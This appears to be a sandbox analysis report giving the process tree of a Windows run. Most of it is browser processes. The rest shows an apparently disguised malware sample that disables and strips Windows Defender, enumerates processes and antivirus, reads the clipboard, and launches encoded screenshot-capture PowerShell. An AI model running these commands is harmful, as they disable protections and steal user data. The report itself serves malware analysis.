  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,109808050592079467,9409402163082911734,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
  2⤵
  PID:3116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,109808050592079467,9409402163082911734,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:1
  2⤵
  PID:4528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,109808050592079467,9409402163082911734,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4496 /prefetch:1
  2⤵
  PID:5048
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1924,109808050592079467,9409402163082911734,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3272 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,109808050592079467,9409402163082911734,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:1
  2⤵
  PID:4916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,109808050592079467,9409402163082911734,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1
  2⤵
  PID:2772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,109808050592079467,9409402163082911734,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1
  2⤵
  PID:1528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,109808050592079467,9409402163082911734,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5248 /prefetch:1
  2⤵
  PID:2388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,109808050592079467,9409402163082911734,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
  2⤵
  PID:3788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1924,109808050592079467,9409402163082911734,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4872 /prefetch:8
  2⤵
  PID:4372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1924,109808050592079467,9409402163082911734,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5780 /prefetch:8
  2⤵
  PID:5196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,109808050592079467,9409402163082911734,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6140 /prefetch:1
  2⤵
  PID:3960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,109808050592079467,9409402163082911734,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6180 /prefetch:1
  2⤵
  PID:5412
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1924,109808050592079467,9409402163082911734,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6060 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,109808050592079467,9409402163082911734,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:1
  2⤵
  PID:4760

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3132

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3008

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004D0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6004

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:804

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x108,0x10c,0x110,0xd8,0x114,0x7ffa906ecc40,0x7ffa906ecc4c,0x7ffa906ecc58
  2⤵
  PID:5888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1952,i,13777804736840535646,16977098038701894680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1948 /prefetch:2
  2⤵
  PID:1640
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1752,i,13777804736840535646,16977098038701894680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1984 /prefetch:3
  2⤵
  PID:2268
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2212,i,13777804736840535646,16977098038701894680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2420 /prefetch:8
  2⤵
  PID:1956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3080,i,13777804736840535646,16977098038701894680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3100 /prefetch:1
  2⤵
  PID:4528
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3120,i,13777804736840535646,16977098038701894680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3264 /prefetch:1
  2⤵
  PID:1652
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4456,i,13777804736840535646,16977098038701894680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4452 /prefetch:1
  2⤵
  PID:4796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4724,i,13777804736840535646,16977098038701894680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4740 /prefetch:8
  2⤵
  PID:3112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4952,i,13777804736840535646,16977098038701894680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4944 /prefetch:8
  2⤵
  PID:3656
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4636,i,13777804736840535646,16977098038701894680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4976 /prefetch:1
  2⤵
  PID:5084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4328,i,13777804736840535646,16977098038701894680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4404 /prefetch:1
  2⤵
  PID:2260
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5056,i,13777804736840535646,16977098038701894680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3184 /prefetch:8
  2⤵
  PID:1628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5028,i,13777804736840535646,16977098038701894680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4744 /prefetch:8
  2⤵
  - Modifies registry class
  PID:1524
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5408,i,13777804736840535646,16977098038701894680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5412 /prefetch:8
  2⤵
  PID:3152
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5400,i,13777804736840535646,16977098038701894680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4564 /prefetch:1
  2⤵
  PID:2200

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4916

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:5692
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:5132
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1916 -parentBuildID 20240401114208 -prefsHandle 1852 -prefMapHandle 1844 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b095fd6-5eca-43ac-a78d-096e53fd91e2} 5132 "\\.\pipe\gecko-crash-server-pipe.5132" gpu
    3⤵
    PID:4544
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2328 -parentBuildID 20240401114208 -prefsHandle 2252 -prefMapHandle 2248 -prefsLen 23714 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a151fc1e-be8e-4512-924c-823e9b303b31} 5132 "\\.\pipe\gecko-crash-server-pipe.5132" socket
    3⤵
    - Checks processor information in registry
    PID:5876
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3020 -childID 1 -isForBrowser -prefsHandle 3220 -prefMapHandle 3232 -prefsLen 23855 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {af76b9f1-c67c-48fe-9a48-dd0e7b128664} 5132 "\\.\pipe\gecko-crash-server-pipe.5132" tab
    3⤵
    PID:1044
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3568 -childID 2 -isForBrowser -prefsHandle 3384 -prefMapHandle 2676 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8605b7cb-ffe1-4910-9a14-3dbd8df6870f} 5132 "\\.\pipe\gecko-crash-server-pipe.5132" tab
    3⤵
    PID:4296
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4304 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4132 -prefMapHandle 4164 -prefsLen 29088 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4900d69b-345d-4066-a8ed-a707843eca2d} 5132 "\\.\pipe\gecko-crash-server-pipe.5132" utility
    3⤵
    - Checks processor information in registry
    PID:244
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5380 -childID 3 -isForBrowser -prefsHandle 5400 -prefMapHandle 5396 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e4b2f716-e654-4e39-b7fa-839032e72c9d} 5132 "\\.\pipe\gecko-crash-server-pipe.5132" tab
    3⤵
    PID:4896
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5604 -childID 4 -isForBrowser -prefsHandle 5524 -prefMapHandle 5528 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9b3401cb-b86a-4ff5-87a8-3af80aab44a9} 5132 "\\.\pipe\gecko-crash-server-pipe.5132" tab
    3⤵
    PID:4272
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5732 -childID 5 -isForBrowser -prefsHandle 5808 -prefMapHandle 5804 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb09bc96-841f-498e-980e-b945a1576869} 5132 "\\.\pipe\gecko-crash-server-pipe.5132" tab
    3⤵
    PID:4816
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6040 -childID 6 -isForBrowser -prefsHandle 6032 -prefMapHandle 6028 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a703b327-9cc6-410c-b673-4b0ee15e9f1b} 5132 "\\.\pipe\gecko-crash-server-pipe.5132" tab
    3⤵
    PID:1176
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6176 -childID 7 -isForBrowser -prefsHandle 6184 -prefMapHandle 6188 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2c2d56f6-112b-4e00-b1c6-1356715789d4} 5132 "\\.\pipe\gecko-crash-server-pipe.5132" tab
    3⤵
    PID:5620
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6252 -parentBuildID 20240401114208 -prefsHandle 6224 -prefMapHandle 6228 -prefsLen 29276 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1bb5b952-bdd2-4a6e-a7f2-24631691da3e} 5132 "\\.\pipe\gecko-crash-server-pipe.5132" rdd
    3⤵
    PID:3416
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6424 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 6212 -prefMapHandle 6216 -prefsLen 29276 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e0868508-113e-4215-9cc1-38d3494c6f1e} 5132 "\\.\pipe\gecko-crash-server-pipe.5132" utility
    3⤵
    - Checks processor information in registry
    PID:4768
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6816 -childID 8 -isForBrowser -prefsHandle 6784 -prefMapHandle 6808 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {67e8bd7d-0b88-4d32-acab-8f0e9fd3520b} 5132 "\\.\pipe\gecko-crash-server-pipe.5132" tab
    3⤵
    PID:552
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5640 -childID 9 -isForBrowser -prefsHandle 5676 -prefMapHandle 5652 -prefsLen 27182 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ea10d37e-9bed-4f00-a13b-4ad8f99252b5} 5132 "\\.\pipe\gecko-crash-server-pipe.5132" tab
    3⤵
    PID:824
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5712 -childID 10 -isForBrowser -prefsHandle 7088 -prefMapHandle 7084 -prefsLen 27182 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2015d2be-0509-4351-97f9-a4cef32ad9c0} 5132 "\\.\pipe\gecko-crash-server-pipe.5132" tab
    3⤵
    PID:4480

C:\Users\Admin\Desktop\255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
"C:\Users\Admin\Desktop\255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe"
1⤵
- Executes dropped EXE
PID:5332
- C:\Users\Admin\Desktop\255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
  "C:\Users\Admin\Desktop\255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:5460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe'"
    3⤵
    PID:5704
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    PID:1548
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Solara has been repaired.', 0, 'Solara | Repaired', 48+16);close()""
    3⤵
    PID:2304
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Solara has been repaired.', 0, 'Solara | Repaired', 48+16);close()"
      4⤵
      PID:4004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'"
    3⤵
    PID:5144
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5196
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5264
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:5640
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:3000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:1380
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:1672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4680
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4688
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:4740
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8A